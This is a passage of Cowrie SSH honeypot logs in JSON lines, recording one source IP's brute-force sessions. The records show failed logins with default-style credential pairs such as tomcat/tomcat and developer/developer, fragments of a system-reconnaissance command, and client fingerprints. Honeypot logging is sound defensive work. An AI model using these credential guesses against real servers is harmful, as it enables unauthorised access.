{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.367084Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.368883Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.369525Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.370280Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.370992Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.371925Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.372469Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42746,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8b75c353ac0","protocol":"ssh","message":"New connection: 212.227.235.229:42746 (1.2.3.4:22) [session: c8b75c353ac0]","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.560968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.697792Z","src_ip":"212.227.235.229","session":"c8b75c353ac0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:01.860807Z","src_ip":"212.227.235.229","session":"c8b75c353ac0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:18:02.526011Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:02.527152Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:02.528873Z","src_ip":"212.227.235.229","session":"417f4908fa1b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0987654321","message":"login attempt [admin/0987654321] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:03.107435Z","src_ip":"212.227.235.229","session":"c8b75c353ac0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:04.355950Z","src_ip":"212.227.235.229","session":"c8b75c353ac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50370,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f646132f9e8","protocol":"ssh","message":"New connection: 212.227.235.229:50370 (1.2.3.4:22) [session: 0f646132f9e8]","sensor":"my-vps","timestamp":"2025-08-26T21:18:08.096017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:08.248356Z","src_ip":"212.227.235.229","session":"0f646132f9e8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:08.352560Z","src_ip":"212.227.235.229","session":"0f646132f9e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50382,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b9a0e481476","protocol":"ssh","message":"New connection: 212.227.235.229:50382 (1.2.3.4:22) [session: 9b9a0e481476]","sensor":"my-vps","timestamp":"2025-08-26T21:18:09.768793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:09.769785Z","src_ip":"212.227.235.229","session":"9b9a0e481476"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50390,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e37e6ac593","protocol":"ssh","message":"New connection: 212.227.235.229:50390 (1.2.3.4:22) [session: b3e37e6ac593]","sensor":"my-vps","timestamp":"2025-08-26T21:18:10.465361Z"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:10.669146Z","src_ip":"212.227.235.229","session":"0f646132f9e8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:12.116262Z","src_ip":"212.227.235.229","session":"b3e37e6ac593"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:12.579629Z","src_ip":"212.227.235.229","session":"0f646132f9e8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:13.955333Z","src_ip":"212.227.235.229","session":"b3e37e6ac593"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50408,"dst_ip":"1.2.3.4","dst_port":22,"session":"b22861a85b39","protocol":"ssh","message":"New connection: 212.227.235.229:50408 (1.2.3.4:22) [session: b22861a85b39]","sensor":"my-vps","timestamp":"2025-08-26T21:18:14.127900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:14.183418Z","src_ip":"212.227.235.229","session":"b22861a85b39"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:15.329928Z","src_ip":"212.227.235.229","session":"b22861a85b39"}
{"eventid":"cowrie.login.failed","username":"teste","password":"teste","message":"login attempt [teste/teste] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:15.814056Z","src_ip":"212.227.235.229","session":"b3e37e6ac593"}
{"eventid":"cowrie.login.failed","username":"ace","password":"ace","message":"login attempt [ace/ace] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:16.434139Z","src_ip":"212.227.235.229","session":"b22861a85b39"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:18:16.990980Z","src_ip":"212.227.235.229","session":"9b9a0e481476"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:17.476738Z","src_ip":"212.227.235.229","session":"b3e37e6ac593"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:17.684264Z","src_ip":"212.227.235.229","session":"b22861a85b39"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T21:18:18.468779Z","src_ip":"212.227.235.229","session":"9b9a0e481476"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:18:19.962611Z","src_ip":"212.227.235.229","session":"9b9a0e481476"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42902,"dst_ip":"1.2.3.4","dst_port":22,"session":"41cc1324d62a","protocol":"ssh","message":"New connection: 212.227.235.229:42902 (1.2.3.4:22) [session: 41cc1324d62a]","sensor":"my-vps","timestamp":"2025-08-26T21:18:20.698446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:18:20.789378Z","src_ip":"212.227.235.229","session":"41cc1324d62a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh